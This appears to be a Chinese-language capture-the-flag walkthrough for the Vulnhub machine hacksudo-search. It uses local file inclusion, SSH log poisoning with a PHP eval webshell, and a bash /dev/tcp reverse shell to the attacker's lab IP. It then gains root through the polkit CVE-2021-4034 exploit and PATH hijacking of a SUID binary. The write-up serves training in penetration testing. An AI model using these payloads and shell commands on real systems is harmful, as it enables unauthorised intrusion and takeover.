当前位置: 首页 > news >正文

Vulnhub靶机:hacksudo-search

news 2025/8/5 8:13:43

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:hacksudo-search(10.0.2.50)

目标:获取靶机root权限和flag

靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudo-search.zip

二、信息收集

使用nmap主机发现靶机ip:10.0.2.50

在这里插入图片描述

使用nmap端口扫描发现,靶机开放端口:22、80

在这里插入图片描述

80端口:打开网站发现是一个搜索页面,查看源码未发现隐藏信息

在这里插入图片描述

使用gobuster和dirsearch工具进行目录爆破,发现/.env、/robots.txt、/search1.php文件

gobuster dir -u http://10.0.2.50 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtdirsearch -u http://10.0.2.50 /usr/share/wordlists/dirb/big.txt

在这里插入图片描述
在这里插入图片描述

/.env文件存在一段加密信息和数据库的用户名密码:hiraman:MyD4dSuperH3r0!

aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK

解密得到:hacksudo help you to learn CTF , contact us www.hacksudo.com/contact

在这里插入图片描述

/robots.txt文件

在这里插入图片描述

/search1.php文件是另一个搜索页面

在这里插入图片描述

查看源码发现隐藏信息:find me @hacksudo.com/contact @fuzzing always best option :)

在这里插入图片描述

点击Contact,在URL发现FUZZ字段:http://10.0.2.50/search1.php?FUZZ=contact.php,怀疑存在文件包含漏洞

在这里插入图片描述

使用wfuzz工具探测一波,发现一个LFI

wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt http://10.0.2.50/search1.php?FUZZ=/etc/passwd

在这里插入图片描述

尝试包含/etc/passwd发现显示passwd文件的内容

在这里插入图片描述

三、漏洞利用

查看/etc/passwd文件发现存在5个用户

monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
root:x:0:0:root:/root:/bin/bash

可以尝试包含这些用户的ssh私钥或一些日志文件,看看有没有权限访问

/home/monali/.ssh/id_rsa
/home/john/.ssh/id_rsa
/home/search/.ssh/id_rsa
/home/hacksudo/.ssh/id_rsa#ssh日志
/var/log/auth.log

发现包含ssh日志出现回显

在这里插入图片描述

可以通过在用户名处注入一句话木马然后使用蚁剑连接

ssh '<?php @eval($_POST['pass']);?>'@10.0.2.50

在这里插入图片描述

反弹shell

bash -c 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'

在这里插入图片描述

获取交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

方法一:

使用命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现存在/usr/lib/policykit-1/polkit-agent-helper-1,该版本的polkit存在提权漏洞CVE-2021-4034

在这里插入图片描述

查看靶机是否存在gcc环境,发现存在

在这里插入图片描述

使用蚁剑将exp上传,编译,执行,获取root权限

在这里插入图片描述

方法二:

根据之前目录爆破发现一个目录/account/,浏览器访问,发现数据库连接文件

在这里插入图片描述

使用文件包含漏洞读取dbconnect.php文件的内容

http://192.168.178.10/search1.php?me=php://filter/convert.base64-encode/resource=./account/dbconnect.php

在这里插入图片描述

使用base64解密发现数据库用户名密码:hacksudo:p@ssword

在这里插入图片描述

尝试使用/.envdbconnect.php文件里面的用户名密码登录ssh,直接登录失败,但使用用户名密码:hacksudo:MyD4dSuperH3r0!,登录ssh成功

在这里插入图片描述

使用命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现文件/home/hacksudo/search/tools/searchinstall

在这里插入图片描述

发现searchinstall程序的源码,该程序会先设置uid,然后以root命令执行install命令

在这里插入图片描述

我们可以通过更改系统的环境变量来进行提权

cd /tmp
echo "/bin/sh" > install
chmod 777 install
export PATH=/tmp:$PATH

执行searchinstall程序获取root权限

在这里插入图片描述

获取flag

在这里插入图片描述

http://www.lryc.cn/news/297866.html

相关文章:

  • Leetcode 188 买卖股票的最佳时机 IV
  • win32编程系统BUG(Win32 API中的WM_SETTEXT消息)
  • Linux防火墙开放
  • 通过 docker-compose 部署 Flink
  • HarmonyOS ArkTS修改App的默认加载的界面(二十)
  • 【前端高频面试题--Vue基础篇】
  • Spring Boot 实现热插拔 AOP
  • 2月05日,每日信息差
  • 使用Python进行数据的描述性分析,用少量的描述性指标来概括大量的原始数据
  • 【JS逆向三】逆向某某网站的sign参数,并模拟生成仅供学习
  • 移动光猫gs3101超级密码及改桥接模式教程
  • leetcode 153
  • 【MySQL】数据库的基础——数据库的介绍、MySQL的介绍和架构、SQL分类、MySQL的基本使用、MySQL的存储引擎
  • 后端的技术设计文档
  • Windows10安装PCL1.14.0及点云配准
  • C语言第二十二弹---指针(六)
  • Qt Windows和Android使用MuPDF预览PDF文件
  • MongoDB聚合:$replaceWith
  • Vue 进阶系列丨实现简易VueRouter
  • unity editor 编辑器 GUID localID LocalFileId 查找问题
  • 【Mybatis】从0学习Mybatis(2)
  • ChatGPT高效提问—prompt常见用法(续篇九)
  • echarts的title标题属性
  • 【HTML+CSS】使用CSS中的Position与z-index轻松实现一个简单的自定义标题栏效果
  • 从零开始:用 Rust 编写你的第一个 Web 服务
  • 机器学习复习(8)——逻辑回归
  • 深入解析MySQL 8:事务数据字典的变革
  • jquery写表格,通过后端传值,并合并单元格
  • 百家cms代审
  • 算法学习——LeetCode力扣二叉树篇3